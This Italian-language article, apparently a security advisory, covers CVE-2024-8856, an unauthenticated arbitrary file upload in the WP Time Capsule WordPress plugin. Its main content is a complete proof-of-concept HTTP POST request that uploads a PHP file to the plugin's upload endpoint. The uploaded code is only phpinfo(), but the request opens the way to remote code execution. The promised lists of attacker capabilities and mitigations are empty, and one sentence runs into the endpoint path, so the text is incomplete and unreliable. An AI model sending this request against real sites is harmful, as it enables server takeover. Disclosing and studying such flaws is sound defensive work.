
Vulnerabilità di Caricamento Arbitrario di File nel Plugin WordPress WP Time Capsule
CVE-2024-8856 è una vulnerabilità di sicurezza riscontrata nel plugin WP Time Capsule per WordPress che consente a utenti non autenticati di caricare file arbitrari sul server. Ciò può portare all'esecuzione remota di codice se i file caricati vengono eseguiti dal server. La vulnerabilità deriva da una validazione insufficiente dei file e può essere sfruttata inviando richieste appositamente formulate all'endpoint vulnerabile.
Questa vulnerabilità consente a un utente non autenticato di:
Di seguito è riportato un proof of concept che dimostra come sfruttare la vulnerabilità CVE-2024-8856 inviando una richiesta POST all'endpoint vulnerabile.
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
<?php phpinfo();, che mostrerà i dettagli di configurazione PHP se eseguito./wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php è il punto di sfruttamento.Per mitigare questa vulnerabilità:
CVE-2024-8856 - Database Nazionale delle Vulnerabilità
CVE-2024-8856 è una vulnerabilità grave che richiede attenzione immediata da parte degli amministratori di siti WordPress che utilizzano il plugin WP Time Capsule. È necessario adottare le opportune precauzioni per proteggere l'applicazione da potenziali sfruttamenti. Rimanere sempre aggiornati con le pratiche di sicurezza e gli aggiornamenti dei plugin.